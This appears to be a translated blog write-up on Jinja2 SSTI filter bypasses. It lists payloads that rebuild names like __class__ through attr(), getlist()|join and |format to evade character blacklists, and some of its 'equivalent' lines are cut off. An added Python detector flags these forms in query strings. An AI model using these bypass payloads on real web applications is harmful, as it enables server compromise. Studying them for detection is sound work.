Python SSTI bypass

Principle
First, a Jinja2 template injection example:
{{request[request.args.param]}} can be replaced by {{request|attr(request.args.param)}}, which bypasses a filter on "[" and "]".
The bypass approach is synonymous-sentence conversion: rewriting an expression into an equivalent one that no longer contains the filtered characters. Other substitutions for bypassing the "_" character are given below:
?exp={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
which is equivalent to ?exp={{request|attr(
which is equivalent to ?exp={{request|attr(
which is equivalent to ?exp={{request|attr(
which is equivalent to ?exp={{request.__class__}}

Some bypass postures are given below. Suppose the page's own injectable parameter is exploit and the injected statement is something like request.__class__.
① Bypassing "[", "]" and similar keywords
Use a tuple () instead, and pass the pieces in as additional parameters:
exploit={{request|attr(
An optimisation using .getlist() (also bypasses ","):
{{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
② Bypassing "|join"
Use the |format filter: pass in a format string containing %s, then pass the character to be substituted in:
exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)|join)}}&f=%s%sclass%s%s&a=_
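From the defender's side, the rewrites above show why blacklisting "_", "[" or "," in a parameter is not a fix: the same attribute lookup can be reassembled through attr(), getlist()|join or |format. The following added example is not from the original post; it scans constructed query strings (my own samples, stdlib only) for exactly those rewritten forms, including a dunder name rebuilt from repeated parameter values, so a WAF rule or log review can flag them. The real fix remains never rendering user input as template source.

```python
import re
from urllib.parse import parse_qs

# Constructed sample query strings; not taken from any real log.
SAMPLE_QUERIES = [
    "q=hello&page=2",
    "param={{request|attr(request.args.param)}}",
    "exp={{request|attr(request.args.getlist(request.args.l)|join)}}"
    "&l=a&a=_&a=_&a=class&a=_&a=_",
    "exp={{request|attr(request.args.f|format(request.args.a,request.args.a,"
    "request.args.a,request.args.a)|join)}}&f=%25s%25sclass%25s%25s&a=_",
]

TEMPLATE_DELIM = re.compile(r"\{\{|\{%")                      # {{ or {% in a value
ATTR_FROM_REQUEST = re.compile(r"\battr\s*\(\s*request\.args")  # attr() name comes from the request
GETLIST_JOIN = re.compile(r"getlist\s*\([^)]*\)\s*\|\s*join")   # list reassembled with |join
FORMAT_FILTER = re.compile(r"\|\s*format\s*\(")                 # |format(...) filter
DUNDER = re.compile(r"__\w+__")                                 # e.g. __class__


def detect_ssti_bypass(query):
    """Return a list of findings for one raw query string (empty if benign)."""
    findings = []
    params = parse_qs(query, keep_blank_values=True)
    # Does any parameter carry a %s format template (used by the |format trick)?
    has_fmt_template = any("%s" in v for vs in params.values() for v in vs)
    for name, values in params.items():
        for value in values:
            if TEMPLATE_DELIM.search(value):
                findings.append(f"{name}: template delimiter")
            if ATTR_FROM_REQUEST.search(value):
                findings.append(f"{name}: attr() name taken from request.args")
            if GETLIST_JOIN.search(value):
                findings.append(f"{name}: getlist()|join list reassembly")
            if FORMAT_FILTER.search(value) and has_fmt_template:
                findings.append(f"{name}: |format filter fed a %s template")
        # A name such as __class__ rebuilt from repeated values of one parameter
        joined = "".join(values)
        if len(values) > 1 and DUNDER.search(joined):
            findings.append(f"{name}: repeated values reassemble {joined}")
    return findings


def scan(queries):
    """Map each query string to its findings; handy for a batch of log lines."""
    return {q: detect_ssti_bypass(q) for q in queries}


if __name__ == "__main__":
    for q, hits in scan(SAMPLE_QUERIES).items():
        print(q, "->", hits or "clean")
```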


Source: www.cnblogs.com/cimuhuashuimu/p/11544445.html